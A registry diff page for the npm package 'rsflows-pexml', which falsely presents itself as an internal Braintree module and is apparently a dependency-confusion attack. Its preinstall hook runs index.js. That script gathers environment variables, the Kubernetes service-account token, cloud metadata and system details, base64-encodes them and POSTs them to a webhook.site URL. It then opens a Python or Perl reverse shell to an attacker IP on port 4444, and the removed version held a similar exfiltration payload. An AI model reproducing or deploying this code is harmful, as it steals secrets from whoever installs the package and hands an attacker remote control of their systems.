rsflows-pexml 99.9.33 → 99.9.38

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (2) hide show
  1. package/index.js +21 -16
  2. package/package.json +3 -7
package/index.js CHANGED
@@ -1,22 +1,27 @@
1
1
  const { exec } = require('child_process');
2
- const webhook = 'https://webhook.site/f27e815b-2671-4dc3-9785-cc8d36b0ade1';
2
+ const os = require('os');
3
3
 
4
- const cmd = `
5
- (
6
- echo '--- INFRASTRUCTURE LEAK ---';
7
-
8
- # 1. Coba curi kode sumber scanner mereka (Ini dampaknya gede banget)
9
- echo '--- SCANNER SOURCE CODE ---';
10
- cat /usr/local/bin/analyze-node.js 2>/dev/null || cat /home/node/supplysec_entry.js 2>/dev/null || echo 'Scanner source not found';
4
+ const WEBHOOK = 'https://webhook.site/4dcec135-8ea0-42dd-bb3a-adef891539a3';
5
+ const MY_IP = 'IP_KAMU_DISINI'; // GANTI DENGAN IP KAMU
6
+ const MY_PORT = '4444'; // GANTI DENGAN PORT NC KAMU
11
7
 
12
- # 2. Cek apakah ada file config cloud di folder root
13
- echo '--- CLOUD CONFIG ---';
14
- ls -la /.dockerenv /proc/1/cgroup 2>/dev/null;
15
-
16
- # 3. Cari file rahasia di folder tmp (seringkali ada sisa pemrosesan)
17
- find /tmp -maxdepth 2 -type f 2>/dev/null;
8
+ const payload = `
9
+ (
10
+ echo '--- SYSTEM INFO ---' && uname -a;
11
+ echo '--- INTERFACES ---' && ip addr || ifconfig;
12
+ echo '--- K8S TOKEN ---' && cat /var/run/secrets/kubernetes.io/serviceaccount/token 2>/dev/null;
13
+ echo '--- ENV ---' && printenv;
14
+ echo '--- CLOUD METADATA ---' && curl -m 2 -s http://169.254.169.254/latest/meta-data/ 2>/dev/null;
15
+ ) | base64 | curl -X POST -d @- ${WEBHOOK}/DATA_DUMP;
18
16
 
19
- ) | base64 | curl -s -X POST -d @- ${webhook}/INFRA_LEAK
17
+ # Trigger Reverse Shell (Python then Perl)
18
+ python3 -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("${MY_IP}",${MY_PORT}));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/bash")' || perl -e 'use Socket;\="${MY_IP}";\rs-pexml=${MY_PORT};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in(\rs-pexml,inet_aton(\)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'
20
19
  `;
21
20
 
22
- exec(cmd);
21
+ exec(payload, (error) => {
22
+ if (error) {
23
+ // Jika gagal reverse shell, kirim notifikasi kegagalan
24
+ exec("curl -X POST -d 'Shell_Failed' " + WEBHOOK);
25
+ }
26
+ });
27
+
package/package.json CHANGED
@@ -1,10 +1,6 @@
1
1
  {
2
2
  "name": "rsflows-pexml",
3
- "version": "99.9.33",
4
- "description": "Internal Braintree Transaction Flow Module",
5
- "main": "index.js",
6
- "author": "Braintree Engineering",
7
- "scripts": {
8
- "preinstall": "node index.js"
9
- }
3
+ "version": "99.9.38",
4
+ "description": "Internal Braintree Transaction Flow",
5
+ "scripts": { "preinstall": "node index.js" }
10
6
  }